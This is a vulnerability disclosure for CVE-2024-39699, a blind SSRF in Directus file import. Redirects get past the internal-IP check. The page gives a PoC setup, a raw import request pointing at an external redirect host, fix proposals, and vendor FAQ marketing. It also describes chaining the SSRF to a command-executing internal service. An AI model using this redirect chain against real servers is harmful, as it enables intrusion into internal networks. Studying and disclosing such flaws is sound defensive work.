Summary
Directus Blind SSRF On File Import
There was already a reported SSRF vulnerability via file import. https://github.com/directus/directus/security/advisories/GHSA-j3rg-3rgm-537h
It was fixed by resolving all DNS names and checking if the requested IP is an internal IP address.
However it is possible to bypass this security measure and execute a SSRF using redirects. Directus allows redirects when importing file from the URL and does not check the result URL. Thus, it is possible to execute a request to an internal IP, for example to 127.0.0.1.
However, it is blind SSRF, because Directus also uses response interception technique to get the information about the connect from the socket directly and it does not show a response if the IP address is internal (nice fix, by the way :) ).
But the blindness does not fully mitigate the impact of the vulnerability. The blind SSRF is still exploitable in the real life scenarios, because there could be a vulnerable software inside of the network which can be exploited with GET request. I will show the example in the PoC. Also, you can check HackTricks page with some known cases.
Details
Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer.
PoC
For testing I used the docker compose with the latest directus version. Here is my docker compose file
version: "3"
services:
directus:
image: directus/directus:10.8.3
ports:
- 8055:8055
volumes:
- ./database:/directus/database
- ./uploads:/directus/uploads
- ./extensions:/directus/extensions
environment:
KEY: "redacted"
SECRET: "redacted"
ADMIN_EMAIL: "[email protected]"
ADMIN_PASSWORD: "redacted"
DB_CLIENT: "sqlite3"
DB_FILENAME: "/directus/database/data.db"
As a first step it is needed to setup a redirect server which will redirect the incoming request to some internal URL. I did it on my VPS with the public IP.
After it I setup a simple HTTP Server emulating the vulnerable application inside the internal network. It just execute any shell command provided in the cmd GET-parameter.
After it the directus import functionality was used
It initiates the following HTTP request
POST /files/import HTTP/1.1
Host: 127.0.0.1:8055
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Authorization: Bearer redacteed
Content-Type: application/json
Content-Length: 44
Origin: http://127.0.0.1:8055
Connection: close
Referer: http://127.0.0.1:8055/admin/files/+
Cookie: directus_refresh_token=redacted
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
{"url":"http://94.103.84.233:801","data":{}}
It can be seen on the redirect server that the request came to it.
And we can also see the request in the localhost server (the same host as directus), which confirms the bypass and the SSRF.
And the rce_poc file was created.
Fix proposition
I think there are two ways to fix this vulnerability:
- Disallow redirects for the import requests
- Check the Location header in the import request response if it is present. Drop the request if the Location url points to the internal IP.
Impact
The impact is Blind SSRF. Using it an attacker can initiate HTTP GET requests to the internal network. For example, it can be used to exploit some GET-based vulnerabilities of other software in the internal network.
Untrusted input controls the target URL of a server-initiated request, which may reach internal services not otherwise accessible from outside. Typical impact: access to internal metadata services, internal APIs, or cloud credentials.
CVE-2024-39699 has a CVSS score of 5.0 (Medium). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (17.1.0); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Already deployed Kodem?
See it in your environmentNew to Kodem? Get a demo →Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2024-39699? CVE-2024-39699 is a medium-severity server-side request forgery (SSRF) vulnerability in @directus/api (npm), affecting versions < 17.1.0. It is fixed in 17.1.0. Untrusted input controls the target URL of a server-initiated request, which may reach internal services not otherwise accessible from outside.
- How severe is CVE-2024-39699? CVE-2024-39699 has a CVSS score of 5.0 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of @directus/api are affected by CVE-2024-39699? @directus/api (npm) versions < 17.1.0 is affected.
- Is there a fix for CVE-2024-39699? Yes. CVE-2024-39699 is fixed in 17.1.0. Upgrade to this version or later.
- Is CVE-2024-39699 exploitable, and should I be worried? Whether CVE-2024-39699 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2024-39699 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2024-39699? Upgrade
@directus/apito 17.1.0 or later.